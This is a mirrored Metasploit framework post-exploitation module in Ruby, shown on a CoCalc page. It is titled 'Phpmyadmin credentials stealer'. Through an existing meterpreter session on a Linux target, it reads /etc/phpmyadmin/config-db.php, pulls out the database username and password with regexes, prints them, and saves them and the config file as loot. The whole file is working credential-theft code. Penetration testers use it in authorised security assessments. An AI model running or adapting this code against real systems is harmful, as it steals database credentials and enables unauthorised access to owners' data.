Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/phpmyadmin_credsteal.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
8
include Msf::Post::File
9
include Msf::Post::Linux::Priv
10
include Msf::Post::Linux::System
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Phpmyadmin credentials stealer',
17
'Description' => %q{
18
This module gathers Phpmyadmin creds from target linux machine.
19
},
20
'License' => MSF_LICENSE,
21
'Platform' => ['linux'],
22
'SessionTypes' => ['meterpreter'],
23
'Author' => [
24
'Chaitanya Haritash [bofheaded]',
25
'Dhiraj Mishra <[email protected]>'
26
],
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [],
30
'Reliability' => []
31
}
32
)
33
)
34
end
35
36
def parse_creds(contents)
37
db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
38
db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
39
40
unless db_user && db_pass
41
print_error("Couldn't find PhpMyAdmin credentials")
42
return
43
end
44
45
print_good("User: #{db_user}")
46
print_good("Password: #{db_pass}")
47
48
print_status('Storing credentials...')
49
store_valid_credential(user: db_user, private: db_pass)
50
end
51
52
def run
53
print_line("\nPhpMyAdmin Creds Stealer!\n")
54
55
if session.platform.include?('windows')
56
print_error('This module is not compatible with windows')
57
return
58
end
59
60
conf_path = '/etc/phpmyadmin/config-db.php'
61
unless file_exist?(conf_path)
62
print_error("#{conf_path} doesn't exist on target")
63
return
64
end
65
66
print_good('PhpMyAdmin config found!')
67
res = read_file(conf_path)
68
unless res
69
print_error('You may not have permissions to read the file.')
70
return
71
end
72
73
print_good('Extracting creds')
74
parse_creds(res)
75
76
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
77
print_good("Config file located at #{p}")
78
end
79
end
80
81